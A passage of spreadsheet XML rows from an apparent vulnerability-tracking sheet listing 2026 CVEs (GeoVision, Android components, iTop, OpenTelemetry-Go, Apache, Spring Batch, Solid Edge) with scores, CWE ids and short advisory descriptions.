      <c r="C2945" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2945" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2945" s="5" t="inlineStr"/>
      <c r="F2945" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2945" s="5" t="inlineStr"/>
      <c r="H2945" s="5" t="inlineStr"/>
      <c r="I2945" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2945" s="5" t="inlineStr"/>
      <c r="K2945" s="5" t="inlineStr">
        <is>
          <t>CWE-428</t>
        </is>
      </c>
      <c r="L2945" s="5" t="inlineStr">
        <is>
          <t>A DLL hijacking vulnerability in GeoVision GV-ASManager allows a local attacker with write access to an unsafe search directory to execute arbitrary code. By placing a crafted dynamic-link library (DLL) file into the application search path prior to the legitimate library, the malicious code is loaded and executed under the security privileges of the GV-ASManager process.</t>
        </is>
      </c>
      <c r="M2945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18755</t>
        </is>
      </c>
    </row>
    <row r="2946">
      <c r="A2946" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28613</t>
        </is>
      </c>
      <c r="C2946" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2946" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2946" s="5" t="inlineStr"/>
      <c r="F2946" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2946" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2946" s="5" t="inlineStr"/>
      <c r="I2946" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2946" s="5" t="inlineStr"/>
      <c r="K2946" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2946" s="5" t="inlineStr">
        <is>
          <t>In initAppLinkTypeAndIntent of ChannelImpl.java, there is a possible launch an arbitrary intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M2946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t>
        </is>
      </c>
    </row>
    <row r="2947">
      <c r="A2947" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28626</t>
        </is>
      </c>
      <c r="C2947" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2947" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2947" s="5" t="inlineStr"/>
      <c r="F2947" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2947" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2947" s="5" t="inlineStr"/>
      <c r="I2947" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2947" s="5" t="inlineStr"/>
      <c r="K2947" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L2947" s="5" t="inlineStr">
        <is>
          <t>In onCreate of SetupPassthroughActivity.java, there is a possible way to launch arbitrary activity due to Intent redirection . This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M2947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t>
        </is>
      </c>
    </row>
    <row r="2948">
      <c r="A2948" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28656</t>
        </is>
      </c>
      <c r="C2948" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2948" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2948" s="5" t="inlineStr"/>
      <c r="F2948" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2948" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2948" s="5" t="inlineStr"/>
      <c r="I2948" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2948" s="5" t="inlineStr"/>
      <c r="K2948" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="L2948" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of DeviceAdminAdd.java, there is a possible way to an overlay due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M2948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t>
        </is>
      </c>
    </row>
    <row r="2949">
      <c r="A2949" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30819</t>
        </is>
      </c>
      <c r="C2949" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2949" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2949" s="5" t="inlineStr"/>
      <c r="F2949" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2949" s="5" t="inlineStr"/>
      <c r="H2949" s="5" t="inlineStr"/>
      <c r="I2949" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2949" s="5" t="inlineStr"/>
      <c r="K2949" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2949" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, iTop has a reflected Cross-Site Scripting (XSS) vulnerability in its dashboard revert functionality with the parameter dashboard_id in /pages/ajax.render.php. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M2949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30819</t>
        </is>
      </c>
    </row>
    <row r="2950">
      <c r="A2950" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39883</t>
        </is>
      </c>
      <c r="C2950" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2950" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2950" s="5" t="inlineStr"/>
      <c r="F2950" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2950" s="5" t="inlineStr"/>
      <c r="H2950" s="5" t="inlineStr">
        <is>
          <t>opentelemetry:opentelemetry</t>
        </is>
      </c>
      <c r="I2950" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J2950" s="5" t="inlineStr"/>
      <c r="K2950" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L2950" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From 1.15.0 to 1.42.0, the fix for CVE-2026-24051 changed the Darwin ioreg command to use an absolute path but left the BSD kenv command using a bare name, allowing the same PATH hijacking attack on BSD and Solaris platforms. This vulnerability is fixed in 1.43.0.</t>
        </is>
      </c>
      <c r="M2950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39883</t>
        </is>
      </c>
    </row>
    <row r="2951">
      <c r="A2951" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40542</t>
        </is>
      </c>
      <c r="C2951" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2951" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2951" s="5" t="inlineStr"/>
      <c r="F2951" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2951" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2951" s="5" t="inlineStr">
        <is>
          <t>apache:httpclient</t>
        </is>
      </c>
      <c r="I2951" s="5" t="inlineStr">
        <is>
          <t>2026-04-22</t>
        </is>
      </c>
      <c r="J2951" s="5" t="inlineStr"/>
      <c r="K2951" s="5" t="inlineStr">
        <is>
          <t>CWE-304, CWE-325</t>
        </is>
      </c>
      <c r="L2951" s="5" t="inlineStr">
        <is>
          <t>Missing critical step in authentication in Apache HttpClient 5.6 allows an attacker to cause the client to accept SCRAM-SHA-256 authentication without proper mutual authentication verification. Users are recommended to upgrade to version 5.6.1, which fixes this issue.</t>
        </is>
      </c>
      <c r="M2951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40542</t>
        </is>
      </c>
    </row>
    <row r="2952">
      <c r="A2952" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41605</t>
        </is>
      </c>
      <c r="C2952" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2952" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2952" s="5" t="inlineStr"/>
      <c r="F2952" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2952" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2952" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I2952" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J2952" s="5" t="inlineStr"/>
      <c r="K2952" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2952" s="5" t="inlineStr">
        <is>
          <t>Integer Overflow or Wraparound vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41605</t>
        </is>
      </c>
    </row>
    <row r="2953">
      <c r="A2953" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43869</t>
        </is>
      </c>
      <c r="C2953" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2953" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2953" s="5" t="inlineStr"/>
      <c r="F2953" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2953" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2953" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I2953" s="5" t="inlineStr">
        <is>
          <t>2026-05-05</t>
        </is>
      </c>
      <c r="J2953" s="5" t="inlineStr"/>
      <c r="K2953" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297</t>
        </is>
      </c>
      <c r="L2953" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43869</t>
        </is>
      </c>
    </row>
    <row r="2954">
      <c r="A2954" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44185</t>
        </is>
      </c>
      <c r="C2954" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2954" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2954" s="5" t="inlineStr"/>
      <c r="F2954" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2954" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2954" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I2954" s="5" t="inlineStr">
        <is>
          <t>2026-06-08</t>
        </is>
      </c>
      <c r="J2954" s="5" t="inlineStr"/>
      <c r="K2954" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-126</t>
        </is>
      </c>
      <c r="L2954" s="5" t="inlineStr">
        <is>
          <t>Buffer Over-read vulnerability in Apache HTTP Server via outbound OCSP requests to an attacker controlled OCSP server
This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67.
Users are recommended to upgrade to version 2.4.68, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44185</t>
        </is>
      </c>
    </row>
    <row r="2955">
      <c r="A2955" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45528</t>
        </is>
      </c>
      <c r="C2955" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2955" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2955" s="5" t="inlineStr"/>
      <c r="F2955" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2955" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2955" s="5" t="inlineStr"/>
      <c r="I2955" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2955" s="5" t="inlineStr"/>
      <c r="K2955" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="L2955" s="5" t="inlineStr">
        <is>
          <t>In getManageSpaceActivityIntent of StorageManagerService.java, there is a possible LaunchAnyWhere chain due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M2955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t>
        </is>
      </c>
    </row>
    <row r="2956">
      <c r="A2956" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47878</t>
        </is>
      </c>
      <c r="C2956" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2956" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2956" s="5" t="inlineStr"/>
      <c r="F2956" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2956" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H2956" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_batch</t>
        </is>
      </c>
      <c r="I2956" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2956" s="5" t="inlineStr"/>
      <c r="K2956" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L2956" s="5" t="inlineStr">
        <is>
          <t>DefaultExecutionContextSerializer, used by default in Spring Batch's JDBC job repository, passes Base64-decoded bytes directly to ObjectInputStream.readObject() without an ObjectInputFilter that restricts types to a trusted class allowlist.
Spring Batch 6.0.0 - 6.0.4
Spring Batch 5.2.6 and earlier</t>
        </is>
      </c>
      <c r="M2956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47878</t>
        </is>
      </c>
    </row>
    <row r="2957">
      <c r="A2957" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48098</t>
        </is>
      </c>
      <c r="C2957" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2957" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2957" s="5" t="inlineStr"/>
      <c r="F2957" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2957" s="5" t="inlineStr"/>
      <c r="H2957" s="5" t="inlineStr"/>
      <c r="I2957" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2957" s="5" t="inlineStr"/>
      <c r="K2957" s="5" t="inlineStr">
        <is>
          <t>CWE-250, CWE-78</t>
        </is>
      </c>
      <c r="L2957" s="5" t="inlineStr">
        <is>
          <t>NexTor IP Changer is a command-line tool that leverages the Tor network to periodically rotate a user's IP address. Versions prior to 2.0.0 execute privileged system commands using `sudo` and `shell=True` directly inside application logic. In environments where passwordless sudo (`NOPASSWD`) is enabled, privileged commands may execute silently without explicit user confirmation. Version 2.0.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M2957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48098</t>
        </is>
      </c>
    </row>
    <row r="2958">
      <c r="A2958" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49314</t>
        </is>
      </c>
      <c r="C2958" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2958" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2958" s="5" t="inlineStr"/>
      <c r="F2958" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2958" s="5" t="inlineStr"/>
      <c r="H2958" s="5" t="inlineStr"/>
      <c r="I2958" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2958" s="5" t="inlineStr"/>
      <c r="K2958" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2958" s="5" t="inlineStr">
        <is>
          <t>OOB write vulnerability in the rendering and composition module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="M2958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49314</t>
        </is>
      </c>
    </row>
    <row r="2959">
      <c r="A2959" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50058</t>
        </is>
      </c>
      <c r="C2959" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2959" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2959" s="5" t="inlineStr"/>
      <c r="F2959" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2959" s="5" t="inlineStr"/>
      <c r="H2959" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2959" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2959" s="5" t="inlineStr"/>
      <c r="K2959" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2959" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contains an out of bounds read vulnerability while parsing specially crafted DFT files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50058</t>
        </is>
      </c>
    </row>
    <row r="2960">
      <c r="A2960" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50059</t>
        </is>
      </c>
      <c r="C2960" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2960" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2960" s="5" t="inlineStr"/>
      <c r="F2960" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2960" s="5" t="inlineStr"/>
      <c r="H2960" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2960" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2960" s="5" t="inlineStr"/>
      <c r="K2960" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2960" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contains an out of bounds write vulnerability while parsing specially crafted DFT files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50059</t>
        </is>
      </c>
    </row>
    <row r="2961">
      <c r="A2961" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50060</t>
        </is>
      </c>
      <c r="C2961" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2961" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2961" s="5" t="inlineStr"/>
      <c r="F2961" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2961" s="5" t="inlineStr"/>
      <c r="H2961" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2961" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2961" s="5" t="inlineStr"/>
      <c r="K2961" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2961" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contain a use-after-free vulnerability that could be triggered while parsing specially crafted DFT files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50060</t>
        </is>
      </c>
    </row>
    <row r="2962">
      <c r="A2962" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50061</t>
        </is>
      </c>
      <c r="C2962" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2962" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2962" s="5" t="inlineStr"/>
      <c r="F2962" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2962" s="5" t="inlineStr"/>
      <c r="H2962" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2962" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2962" s="5" t="inlineStr"/>
      <c r="K2962" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2962" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contain a use-after-free vulnerability that could be triggered while parsing specially crafted DFT files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50061</t>
        </is>
      </c>
    </row>
    <row r="2963">
      <c r="A2963" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50062</t>
        </is>
      </c>
      <c r="C2963" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2963" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2963" s="5" t="inlineStr"/>
      <c r="F2963" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2963" s="5" t="inlineStr"/>
      <c r="H2963" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2963" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2963" s="5" t="inlineStr"/>
      <c r="K2963" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2963" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contains an out of bounds read vulnerability while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50062</t>
        </is>
      </c>
    </row>
    <row r="2964">
      <c r="A2964" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50063</t>
        </is>
      </c>
      <c r="C2964" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2964" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2964" s="5" t="inlineStr"/>
      <c r="F2964" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2964" s="5" t="inlineStr"/>
      <c r="H2964" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2964" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2964" s="5" t="inlineStr"/>
      <c r="K2964" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2964" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contains an out of bounds read vulnerability while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50063</t>
        </is>
      </c>
    </row>
    <row r="2965">
      <c r="A2965" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50064</t>
        </is>
      </c>
      <c r="C2965" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2965" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2965" s="5" t="inlineStr"/>
      <c r="F2965" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2965" s="5" t="inlineStr"/>
      <c r="H2965" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2965" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2965" s="5" t="inlineStr"/>
      <c r="K2965" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2965" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contains an out of bounds write vulnerability while parsing specially crafted PSM files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50064</t>
        </is>
      </c>
    </row>
    <row r="2966">
      <c r="A2966" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54737</t>
        </is>
      </c>
      <c r="C2966" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2966" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2966" s="5" t="inlineStr"/>
      <c r="F2966" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2966" s="5" t="inlineStr"/>
      <c r="H2966" s="5" t="inlineStr"/>
      <c r="I2966" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2966" s="5" t="inlineStr"/>
      <c r="K2966" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L2966" s="5" t="inlineStr">
        <is>
